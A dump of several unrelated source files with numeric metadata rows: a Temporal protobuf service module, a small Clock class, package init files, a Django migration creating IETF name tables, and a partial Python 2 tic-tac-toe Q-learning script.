| 31.080808 | 68 | 0.435489 | 333 | 3,077 | 3.93994 | 0.135135 | 0.096037 | 0.08003 | 0.109756 | 0.81936 | 0.789634 | 0.77439 | 0.742378 | 0.742378 | 0.742378 | 0 | 0.035351 | 0.457589 | 3,077 | 98 | 69 | 31.397959 | 0.750749 | 0.045499 | 0 | 0.809524 | 0 | 0 | 0.005156 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8b7b0752748f51ce56002ff7d4600bf3f6dba76a | 9,198 | py | Python | temporalio/api/workflowservice/v1/service_pb2.py | cretz/temporal-sdk-python | 431ca1967d365556a9cf5aa9aac00243b71059f8 | [
"MIT"
] | 55 | 2022-01-31T22:02:22.000Z | 2022-03-30T11:17:21.000Z | temporalio/api/workflowservice/v1/service_pb2.py | cretz/temporal-sdk-python | 431ca1967d365556a9cf5aa9aac00243b71059f8 | [
"MIT"
] | 7 | 2022-02-04T14:08:46.000Z | 2022-03-22T13:27:30.000Z | temporalio/api/workflowservice/v1/service_pb2.py | cretz/temporal-sdk-python | 431ca1967d365556a9cf5aa9aac00243b71059f8 | [
"MIT"
] | 4 | 2022-01-31T17:31:49.000Z | 2022-03-29T01:04:46.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: temporal/api/workflowservice/v1/service.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from temporalio.api.workflowservice.v1 import (
request_response_pb2 as temporal_dot_api_dot_workflowservice_dot_v1_dot_request__response__pb2,
)
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(
b'\n-temporal/api/workflowservice/v1/service.proto\x12\x1ftemporal.api.workflowservice.v1\x1a\x36temporal/api/workflowservice/v1/request_response.proto2\xfb\x32\n\x0fWorkflowService\x12\x8c\x01\n\x11RegisterNamespace\x12\x39.temporal.api.workflowservice.v1.RegisterNamespaceRequest\x1a:.temporal.api.workflowservice.v1.RegisterNamespaceResponse"\x00\x12\x8c\x01\n\x11\x44\x65scribeNamespace\x12\x39.temporal.api.workflowservice.v1.DescribeNamespaceRequest\x1a:.temporal.api.workflowservice.v1.DescribeNamespaceResponse"\x00\x12\x83\x01\n\x0eListNamespaces\x12\x36.temporal.api.workflowservice.v1.ListNamespacesRequest\x1a\x37.temporal.api.workflowservice.v1.ListNamespacesResponse"\x00\x12\x86\x01\n\x0fUpdateNamespace\x12\x37.temporal.api.workflowservice.v1.UpdateNamespaceRequest\x1a\x38.temporal.api.workflowservice.v1.UpdateNamespaceResponse"\x00\x12\x8f\x01\n\x12\x44\x65precateNamespace\x12:.temporal.api.workflowservice.v1.DeprecateNamespaceRequest\x1a;.temporal.api.workflowservice.v1.DeprecateNamespaceResponse"\x00\x12\x9b\x01\n\x16StartWorkflowExecution\x12>.temporal.api.workflowservice.v1.StartWorkflowExecutionRequest\x1a?.temporal.api.workflowservice.v1.StartWorkflowExecutionResponse"\x00\x12\xaa\x01\n\x1bGetWorkflowExecutionHistory\x12\x43.temporal.api.workflowservice.v1.GetWorkflowExecutionHistoryRequest\x1a\x44.temporal.api.workflowservice.v1.GetWorkflowExecutionHistoryResponse"\x00\x12\xbf\x01\n"GetWorkflowExecutionHistoryReverse\x12J.temporal.api.workflowservice.v1.GetWorkflowExecutionHistoryReverseRequest\x1aK.temporal.api.workflowservice.v1.GetWorkflowExecutionHistoryReverseResponse"\x00\x12\x98\x01\n\x15PollWorkflowTaskQueue\x12=.temporal.api.workflowservice.v1.PollWorkflowTaskQueueRequest\x1a>.temporal.api.workflowservice.v1.PollWorkflowTaskQueueResponse"\x00\x12\xad\x01\n\x1cRespondWorkflowTaskCompleted\x12\x44.temporal.api.workflowservice.v1.RespondWorkflowTaskCompletedRequest\x1a\x45.temporal.api.workflowservice.v1.RespondWorkflowTaskCompletedResponse"\x00\x12\xa4\x01\n\x19RespondWorkflowTaskFailed\x12\x41.temporal.api.workflowservice.v1.RespondWorkflowTaskFailedRequest\x1a\x42.temporal.api.workflowservice.v1.RespondWorkflowTaskFailedResponse"\x00\x12\x98\x01\n\x15PollActivityTaskQueue\x12=.temporal.api.workflowservice.v1.PollActivityTaskQueueRequest\x1a>.temporal.api.workflowservice.v1.PollActivityTaskQueueResponse"\x00\x12\xaa\x01\n\x1bRecordActivityTaskHeartbeat\x12\x43.temporal.api.workflowservice.v1.RecordActivityTaskHeartbeatRequest\x1a\x44.temporal.api.workflowservice.v1.RecordActivityTaskHeartbeatResponse"\x00\x12\xb6\x01\n\x1fRecordActivityTaskHeartbeatById\x12G.temporal.api.workflowservice.v1.RecordActivityTaskHeartbeatByIdRequest\x1aH.temporal.api.workflowservice.v1.RecordActivityTaskHeartbeatByIdResponse"\x00\x12\xad\x01\n\x1cRespondActivityTaskCompleted\x12\x44.temporal.api.workflowservice.v1.RespondActivityTaskCompletedRequest\x1a\x45.temporal.api.workflowservice.v1.RespondActivityTaskCompletedResponse"\x00\x12\xb9\x01\n RespondActivityTaskCompletedById\x12H.temporal.api.workflowservice.v1.RespondActivityTaskCompletedByIdRequest\x1aI.temporal.api.workflowservice.v1.RespondActivityTaskCompletedByIdResponse"\x00\x12\xa4\x01\n\x19RespondActivityTaskFailed\x12\x41.temporal.api.workflowservice.v1.RespondActivityTaskFailedRequest\x1a\x42.temporal.api.workflowservice.v1.RespondActivityTaskFailedResponse"\x00\x12\xb0\x01\n\x1dRespondActivityTaskFailedById\x12\x45.temporal.api.workflowservice.v1.RespondActivityTaskFailedByIdRequest\x1a\x46.temporal.api.workflowservice.v1.RespondActivityTaskFailedByIdResponse"\x00\x12\xaa\x01\n\x1bRespondActivityTaskCanceled\x12\x43.temporal.api.workflowservice.v1.RespondActivityTaskCanceledRequest\x1a\x44.temporal.api.workflowservice.v1.RespondActivityTaskCanceledResponse"\x00\x12\xb6\x01\n\x1fRespondActivityTaskCanceledById\x12G.temporal.api.workflowservice.v1.RespondActivityTaskCanceledByIdRequest\x1aH.temporal.api.workflowservice.v1.RespondActivityTaskCanceledByIdResponse"\x00\x12\xb3\x01\n\x1eRequestCancelWorkflowExecution\x12\x46.temporal.api.workflowservice.v1.RequestCancelWorkflowExecutionRequest\x1aG.temporal.api.workflowservice.v1.RequestCancelWorkflowExecutionResponse"\x00\x12\x9e\x01\n\x17SignalWorkflowExecution\x12?.temporal.api.workflowservice.v1.SignalWorkflowExecutionRequest\x1a@.temporal.api.workflowservice.v1.SignalWorkflowExecutionResponse"\x00\x12\xb9\x01\n SignalWithStartWorkflowExecution\x12H.temporal.api.workflowservice.v1.SignalWithStartWorkflowExecutionRequest\x1aI.temporal.api.workflowservice.v1.SignalWithStartWorkflowExecutionResponse"\x00\x12\x9b\x01\n\x16ResetWorkflowExecution\x12>.temporal.api.workflowservice.v1.ResetWorkflowExecutionRequest\x1a?.temporal.api.workflowservice.v1.ResetWorkflowExecutionResponse"\x00\x12\xa7\x01\n\x1aTerminateWorkflowExecution\x12\x42.temporal.api.workflowservice.v1.TerminateWorkflowExecutionRequest\x1a\x43.temporal.api.workflowservice.v1.TerminateWorkflowExecutionResponse"\x00\x12\xa7\x01\n\x1aListOpenWorkflowExecutions\x12\x42.temporal.api.workflowservice.v1.ListOpenWorkflowExecutionsRequest\x1a\x43.temporal.api.workflowservice.v1.ListOpenWorkflowExecutionsResponse"\x00\x12\xad\x01\n\x1cListClosedWorkflowExecutions\x12\x44.temporal.api.workflowservice.v1.ListClosedWorkflowExecutionsRequest\x1a\x45.temporal.api.workflowservice.v1.ListClosedWorkflowExecutionsResponse"\x00\x12\x9b\x01\n\x16ListWorkflowExecutions\x12>.temporal.api.workflowservice.v1.ListWorkflowExecutionsRequest\x1a?.temporal.api.workflowservice.v1.ListWorkflowExecutionsResponse"\x00\x12\xb3\x01\n\x1eListArchivedWorkflowExecutions\x12\x46.temporal.api.workflowservice.v1.ListArchivedWorkflowExecutionsRequest\x1aG.temporal.api.workflowservice.v1.ListArchivedWorkflowExecutionsResponse"\x00\x12\x9b\x01\n\x16ScanWorkflowExecutions\x12>.temporal.api.workflowservice.v1.ScanWorkflowExecutionsRequest\x1a?.temporal.api.workflowservice.v1.ScanWorkflowExecutionsResponse"\x00\x12\x9e\x01\n\x17\x43ountWorkflowExecutions\x12?.temporal.api.workflowservice.v1.CountWorkflowExecutionsRequest\x1a@.temporal.api.workflowservice.v1.CountWorkflowExecutionsResponse"\x00\x12\x92\x01\n\x13GetSearchAttributes\x12;.temporal.api.workflowservice.v1.GetSearchAttributesRequest\x1a<.temporal.api.workflowservice.v1.GetSearchAttributesResponse"\x00\x12\xa4\x01\n\x19RespondQueryTaskCompleted\x12\x41.temporal.api.workflowservice.v1.RespondQueryTaskCompletedRequest\x1a\x42.temporal.api.workflowservice.v1.RespondQueryTaskCompletedResponse"\x00\x12\x95\x01\n\x14ResetStickyTaskQueue\x12<.temporal.api.workflowservice.v1.ResetStickyTaskQueueRequest\x1a=.temporal.api.workflowservice.v1.ResetStickyTaskQueueResponse"\x00\x12\x80\x01\n\rQueryWorkflow\x12\x35.temporal.api.workflowservice.v1.QueryWorkflowRequest\x1a\x36.temporal.api.workflowservice.v1.QueryWorkflowResponse"\x00\x12\xa4\x01\n\x19\x44\x65scribeWorkflowExecution\x12\x41.temporal.api.workflowservice.v1.DescribeWorkflowExecutionRequest\x1a\x42.temporal.api.workflowservice.v1.DescribeWorkflowExecutionResponse"\x00\x12\x8c\x01\n\x11\x44\x65scribeTaskQueue\x12\x39.temporal.api.workflowservice.v1.DescribeTaskQueueRequest\x1a:.temporal.api.workflowservice.v1.DescribeTaskQueueResponse"\x00\x12\x83\x01\n\x0eGetClusterInfo\x12\x36.temporal.api.workflowservice.v1.GetClusterInfoRequest\x1a\x37.temporal.api.workflowservice.v1.GetClusterInfoResponse"\x00\x12\x80\x01\n\rGetSystemInfo\x12\x35.temporal.api.workflowservice.v1.GetSystemInfoRequest\x1a\x36.temporal.api.workflowservice.v1.GetSystemInfoResponse"\x00\x12\x9e\x01\n\x17ListTaskQueuePartitions\x12?.temporal.api.workflowservice.v1.ListTaskQueuePartitionsRequest\x1a@.temporal.api.workflowservice.v1.ListTaskQueuePartitionsResponse"\x00\x42\xb2\x01\n"io.temporal.api.workflowservice.v1B\x0cServiceProtoP\x01Z5go.temporal.io/api/workflowservice/v1;workflowservice\xaa\x02\x1fTemporal.Api.WorkflowService.V1\xea\x02"Temporal::Api::WorkflowService::V1b\x06proto3'
)
_WORKFLOWSERVICE = DESCRIPTOR.services_by_name["WorkflowService"]
if _descriptor._USE_C_DESCRIPTORS == False:
DESCRIPTOR._options = None
DESCRIPTOR._serialized_options = b'\n"io.temporal.api.workflowservice.v1B\014ServiceProtoP\001Z5go.temporal.io/api/workflowservice/v1;workflowservice\252\002\037Temporal.Api.WorkflowService.V1\352\002"Temporal::Api::WorkflowService::V1'
_WORKFLOWSERVICE._serialized_start = 139
_WORKFLOWSERVICE._serialized_end = 6662
# @@protoc_insertion_point(module_scope)
| 278.727273 | 7,932 | 0.877582 | 980 | 9,198 | 8.184694 | 0.25102 | 0.208702 | 0.224411 | 0.289739 | 0.405311 | 0.190749 | 0.004738 | 0 | 0 | 0 | 0 | 0.078153 | 0.013699 | 9,198 | 32 | 7,933 | 287.4375 | 0.805996 | 0.025875 | 0 | 0 | 1 | 0.111111 | 0.909497 | 0.907598 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
8bc066c7b81cee343bb709635df576d2b04f20e4 | 211 | py | Python | modules/emulator/pytari2600/clocks.py | 5space/nesbot | 38a9e8cadf0cbe41ee25e0850c244e2834a6e12c | [
"MIT"
] | 17 | 2016-02-23T22:44:09.000Z | 2022-03-16T02:39:15.000Z | modules/emulator/pytari2600/clocks.py | 5space/nesbot | 38a9e8cadf0cbe41ee25e0850c244e2834a6e12c | [
"MIT"
] | null | null | null | modules/emulator/pytari2600/clocks.py | 5space/nesbot | 38a9e8cadf0cbe41ee25e0850c244e2834a6e12c | [
"MIT"
] | 4 | 2018-02-24T19:52:30.000Z | 2020-11-30T00:38:21.000Z | class Clock(object):
def __init__(self):
self.system_clock = 0
def get_save_state(self):
return self.system_clock
def set_save_state(self, state):
self.system_clock = state
| 21.1 | 36 | 0.654028 | 29 | 211 | 4.37931 | 0.448276 | 0.23622 | 0.354331 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00641 | 0.260664 | 211 | 9 | 37 | 23.444444 | 0.807692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
47cfcc4b44147d3006f54b113222de613dd35647 | 133 | py | Python | src/algorithms/__init__.py | LaudateCorpus1/hermes-5 | d9b50452379fe636da96c2bad2d286afa15cd7b9 | [
"Apache-2.0"
] | 135 | 2015-11-17T09:04:37.000Z | 2022-01-14T07:00:34.000Z | src/algorithms/__init__.py | cacan/hermes | d9b50452379fe636da96c2bad2d286afa15cd7b9 | [
"Apache-2.0"
] | 16 | 2015-11-19T18:04:13.000Z | 2016-11-19T00:30:12.000Z | src/algorithms/__init__.py | cacan/hermes | d9b50452379fe636da96c2bad2d286afa15cd7b9 | [
"Apache-2.0"
] | 68 | 2015-11-13T22:51:57.000Z | 2022-01-26T01:51:09.000Z | import cf
import content_based
import content_based_kmeans
import performance_metrics
import recommender_helpers
import simple_hybrid | 22.166667 | 27 | 0.917293 | 18 | 133 | 6.444444 | 0.611111 | 0.224138 | 0.310345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082707 | 133 | 6 | 28 | 22.166667 | 0.95082 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
47dd0cc959beb01b78da1a197829dd254bcb1832 | 92 | py | Python | uqbar/book/__init__.py | josiah-wolf-oberholtzer/uqbar | 96f86eb6264b0677a9e2931a527769640e5658b6 | [
"MIT"
] | 7 | 2018-12-02T05:59:54.000Z | 2021-12-28T22:40:18.000Z | uqbar/book/__init__.py | josiah-wolf-oberholtzer/uqbar | 96f86eb6264b0677a9e2931a527769640e5658b6 | [
"MIT"
] | 16 | 2017-12-28T22:08:09.000Z | 2022-02-26T14:47:23.000Z | uqbar/book/__init__.py | josiah-wolf-oberholtzer/uqbar | 96f86eb6264b0677a9e2931a527769640e5658b6 | [
"MIT"
] | 5 | 2020-03-28T14:57:47.000Z | 2022-02-01T10:02:18.000Z | from . import console # noqa
from . import extensions # noqa
from . import sphinx # noqa
| 23 | 32 | 0.706522 | 12 | 92 | 5.416667 | 0.5 | 0.461538 | 0.430769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228261 | 92 | 3 | 33 | 30.666667 | 0.915493 | 0.152174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9a45ae043bd649a3267a9ac17658c5394f3670a4 | 15,470 | py | Python | ietf/name/migrations/0001_initial.py | ekr/ietfdb | 8d936836b0b9ff31cda415b0a423e3f5b33ab695 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2 | 2021-11-20T03:40:40.000Z | 2021-11-20T03:40:42.000Z | ietf/name/migrations/0001_initial.py | ekr/ietfdb | 8d936836b0b9ff31cda415b0a423e3f5b33ab695 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | ietf/name/migrations/0001_initial.py | ekr/ietfdb | 8d936836b0b9ff31cda415b0a423e3f5b33ab695 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='BallotPositionName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
('blocking', models.BooleanField(default=False)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ConstraintName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
('penalty', models.IntegerField(default=0, help_text=b'The penalty for violating this kind of constraint; for instance 10 (small penalty) or 10000 (large penalty)')),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DBTemplateTypeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DocRelationshipName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
('revname', models.CharField(max_length=255)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DocReminderTypeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DocTagName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DocTypeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DraftSubmissionStateName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
('next_states', models.ManyToManyField(related_name='previous_states', to='name.DraftSubmissionStateName', blank=True)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='FeedbackTypeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='GroupMilestoneStateName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='GroupStateName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='GroupTypeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='IntendedStdLevelName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='IprDisclosureStateName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='IprEventTypeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='IprLicenseTypeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='LiaisonStatementPurposeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='MeetingTypeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='NomineePositionStateName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RoleName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RoomResourceName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='SessionStatusName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='StdLevelName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='StreamName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TimeSlotTypeName',
fields=[
('slug', models.CharField(max_length=32, serialize=False, primary_key=True)),
('name', models.CharField(max_length=255)),
('desc', models.TextField(blank=True)),
('used', models.BooleanField(default=True)),
('order', models.IntegerField(default=0)),
],
options={
'ordering': ['order'],
'abstract': False,
},
bases=(models.Model,),
),
]
| 39.363868 | 182 | 0.4819 | 1,194 | 15,470 | 6.172529 | 0.078727 | 0.103799 | 0.124559 | 0.166079 | 0.885617 | 0.881954 | 0.881954 | 0.881954 | 0.881954 | 0.881954 | 0 | 0.016643 | 0.370782 | 15,470 | 392 | 183 | 39.464286 | 0.740497 | 0.001357 | 0 | 0.841969 | 0 | 0.002591 | 0.107076 | 0.009646 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.005181 | 0 | 0.012953 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9a6be5d83c56f31ede603bd39a24d877c0d5fb82 | 6,501 | py | Python | arena.py | Jordy281/Tic_Tac_Toe_SuperComputer | 94994c109c281121dc51b4ef02a668c82f219b26 | [
"MIT"
] | null | null | null | arena.py | Jordy281/Tic_Tac_Toe_SuperComputer | 94994c109c281121dc51b4ef02a668c82f219b26 | [
"MIT"
] | null | null | null | arena.py | Jordy281/Tic_Tac_Toe_SuperComputer | 94994c109c281121dc51b4ef02a668c82f219b26 | [
"MIT"
] | null | null | null | #
# This file deals with all functions that has two players/computers playing against each other.
#
#------------------------------------------------------------------------------------------------
# PLAY AGAINST A COMPUTER
#------------------------------------------------------------------------------------------------
def soIHearYouLikeToPlay(Q,states):
s=0
board=copy.deepcopy(states[s])
turn=1
validMove=False
print "Who wants to go first:"
print "1. Me"
print "2. Not Me"
WhosFirst=int(raw_input('Input:'))
if WhosFirst==1:
while game.gameOver(board,turn) is False:
#print board
while validMove is False:
move=int(raw_input('Where would you like to go?:'))
if board[move]==0:
validMove=True
else:
print "Invalid Move! Try again"
board[move]=1
validMove=False
turn+=1
if game.gameOver(board, turn) is True:
if game.threecheck(board) is True:
print "YOU WIN"
return
else:
print board
print "ITS A DRAW"
return
#Computer will find the current state of the board
print "---------------"
s=stateChecker(states, board)
a = np.argmax(Q[s,:])
#print s
#print a
board[a]=2
print board
turn+=1
print "---------------"
print "YOU LOSE"
else:
while game.gameOver(board,turn) is False:
#Computer will find the current state of the board
s=stateChecker(states, board)
a = np.argmax(Q[s,:])
board[a]=1
turn+=1
print board
if game.gameOver is True:
if game.threecheck(board) is True:
print board
print "YOU LOSE"
return
else:
print board
print "ITS A DRAW"
return
move=int(raw_input('Input:'))
board[move]=2
turn+=1
print "YOU WIN"
#------------------------------------------------------------------------------------------------
# SUPER COMPUTER VS RANDOM COMPUTER
# Random Goes first
#------------------------------------------------------------------------------------------------
def TwoComputersRand1(Q, t, states):
s=0
turn =1
board=copy.deepcopy(states[s])
while game.gameOver(board, turn) is False:
#print board
#Computer will find the current state of the board
#s=stateChecker(states, board)
a = np.argmax(Q[s,:])
board[a]=1
sprime=t[s][a]
s=sprime
turn+=1
#print board
if game.gameOver(board, turn) is True:
if game.threecheck(board) is True:
# print "Comp 1 WIN"
#Comp1Win+=1
return 1
else:
#print "ITS A DRAW"
#Draw+=1
return 0
#Computer will find the current state of the board
#s=stateChecker(states, board)
indices=[]
for i in range(0,9):
if t[s][i]>-1:
indices.append(i)
pick = randrange(len(indices))
a = indices[pick]
board[a]=2
